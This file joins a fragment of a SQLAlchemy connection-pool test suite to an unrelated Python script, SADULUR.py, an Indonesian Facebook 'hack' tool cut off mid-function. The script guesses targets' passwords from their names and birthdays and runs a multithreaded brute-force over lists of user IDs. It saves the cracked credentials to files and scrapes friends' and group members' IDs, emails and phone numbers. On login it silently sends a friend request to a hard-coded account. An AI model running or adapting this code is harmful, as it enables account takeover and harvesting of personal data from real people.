t.start()
time.sleep(.5)
eq_(canary, [1])
p1._pool.abort(p2)
time.sleep(1)
eq_(canary, [1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
p = pool.QueuePool(creator=creator,
pool_size=2, timeout=None,
max_overflow=0)
c1 = p.connect()
c2 = p.connect()
conns = [c1.connection, c2.connection]
c1.close()
eq_([c.closed for c in conns], [False, False])
p.dispose()
eq_([c.closed for c in conns], [True, False])
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_([c.closed for c in conns], [True, False])
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.connection is conns[1]
def test_no_overflow(self):
self._test_overflow(40, 0)
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_mixed_close(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = None
assert p.checkedout() == 1
c1 = None
lazy_gc()
assert p.checkedout() == 0
lazy_gc()
assert not pool._refs
def test_overflow_no_gc_tlocal(self):
self._test_overflow_no_gc(True)
def test_overflow_no_gc(self):
self._test_overflow_no_gc(False)
def _test_overflow_no_gc(self, threadlocal):
p = self._queuepool_fixture(pool_size=2,
max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.connection)
return c
for j in range(5):
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
still_opened = len([c for c in strong_refs if not c.closed])
eq_(still_opened, 2)
@testing.requires.predictable_gc
def test_weakref_kaboom(self):
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2 = None
del c1
del c2
gc_collect()
assert p.checkedout() == 0
c3 = p.connect()
assert c3 is not None
def test_trick_the_counter(self):
"""this is a "flaw" in the connection pool; since threadlocal
uses a single ConnectionFairy per thread with an open/close
counter, you can fool the counter into giving you a
ConnectionFairy with an ambiguous counter. i.e. its not true
reference counting."""
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = p.connect()
c2.close()
self.assert_(p.checkedout() != 0)
c2.close()
self.assert_(p.checkedout() == 0)
def test_recycle(self):
p = self._queuepool_fixture(pool_size=1,
max_overflow=0,
recycle=3)
c1 = p.connect()
c_id = id(c1.connection)
c1.close()
c2 = p.connect()
assert id(c2.connection) == c_id
c2.close()
time.sleep(4)
c3 = p.connect()
assert id(c3.connection) != c_id
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(reset_on_return=None, pool_size=1, max_overflow=0)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._use_threadlocal is False
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
c_id = c1.connection.id
c2 = p.connect()
assert c2.connection.id != c1.connection.id
dbapi.raise_error = True
c2.invalidate()
c2 = None
c2 = p.connect()
assert c2.connection.id != c1.connection.id
con = c1.connection
assert not con.closed
c1.close()
assert con.closed
def test_threadfairy(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c1.close()
c2 = p.connect()
assert c2.connection is not None
class SingletonThreadPoolTest(PoolTestBase):
def test_cleanup(self):
self._test_cleanup(False)
def test_cleanup_no_gc(self):
self._test_cleanup(True)
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
p = pool.SingletonThreadPool(creator=dbapi.connect,
pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(.1)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join()
assert len(p._all_conns) == 3
if strong_refs:
still_opened = len([c for c in sr if not c.closed])
eq_(still_opened, 3)
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect()
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
creator = lambda: dbapi.connect('foo.db')
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
|
SADULUR.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Closed'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;97m█████████\n \x1b[1;97m█▄█████▄█ \x1b[1;96m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;97m█ \x1b[1;91m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;97m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;97m█ \x1b[1;91m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mSADULUR v6.1\n \x1b[1;97m█████████ \x1b[1;96m«==========✧==========»\n \x1b[1;97m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m Mr.Sadut \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/Cyber Domba\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mFB \x1b[1;91m: \x1b[1;92\x1b[92mhttps://fb.me/Sadoet75\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝"
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBO6OK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mEmail \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mSandi \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mName\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPhone Number\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mPhone Number\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLocation\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLocation\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mBirthday\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mBirthday\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSchool\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mNot found'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] User not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Checker'
print '║-> \x1b[1;37;40m6. Get ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
